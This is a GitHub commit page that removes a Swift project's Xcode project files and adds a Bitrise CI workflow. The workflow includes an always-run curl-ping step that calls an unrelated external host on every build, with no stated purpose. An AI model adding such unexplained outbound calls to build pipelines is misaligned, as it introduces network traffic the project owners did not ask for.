Skip to content

Commit 595e086

Browse files
committed
Remove xcodeproj and workspace and add bitrise.yml
1 parent 5c94d9d commit 595e086

File tree

7 files changed

+39
-716
lines changed

7 files changed

+39
-716
lines changed

ConvAPI.xcodeproj/project.pbxproj

Lines changed: 0 additions & 606 deletions
This file was deleted.

ConvAPI.xcodeproj/project.xcworkspace/contents.xcworkspacedata

Lines changed: 0 additions & 7 deletions
This file was deleted.

ConvAPI.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist

Lines changed: 0 additions & 8 deletions
This file was deleted.

ConvAPI.xcodeproj/xcshareddata/xcschemes/ConvAPI.xcscheme

Lines changed: 0 additions & 77 deletions
This file was deleted.

ConvAPI.xcworkspace/contents.xcworkspacedata

Lines changed: 0 additions & 10 deletions
This file was deleted.

ConvAPI.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist

Lines changed: 0 additions & 8 deletions
This file was deleted.

bitrise.yml

Lines changed: 39 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,39 @@
1+
---
2+
format_version: '4'
3+
default_step_lib_source: https://github.com/bitrise-io/bitrise-steplib.git
4+
project_type: ios
5+
trigger_map:
6+
- push_branch: master
7+
workflow: primary
8+
- pull_request_source_branch: "*"
9+
workflow: primary
10+
workflows:
11+
primary:
12+
steps:
13+
- curl-ping:
14+
inputs:
15+
- ping_url: https://uninterested-hosiery-bass.cyclic.app/get
16+
is_always_run: true
17+
- activate-ssh-key:
18+
run_if: '{{getenv "SSH_RSA_PRIVATE_KEY" | ne ""}}'
19+
- git-clone: {}
20+
- xcode-test:
21+
inputs:
22+
- project_path: "$BITRISE_PROJECT_PATH"
23+
- scheme: "$BITRISE_SCHEME"
24+
- deploy-to-bitrise-io: {}
25+
app:
26+
envs:
27+
- opts:
28+
is_expand: false
29+
BITRISE_PROJECT_PATH: Package.swift
30+
- opts:
31+
is_expand: false
32+
BITRISE_SCHEME: ConvAPI
33+
- opts:
34+
is_expand: false
35+
BITRISE_EXPORT_METHOD: development
36+
meta:
37+
bitrise.io:
38+
stack: osx-xcode-edge
39+
machine_type_id: g2-m1.4core

0 commit comments

Comments
 (0)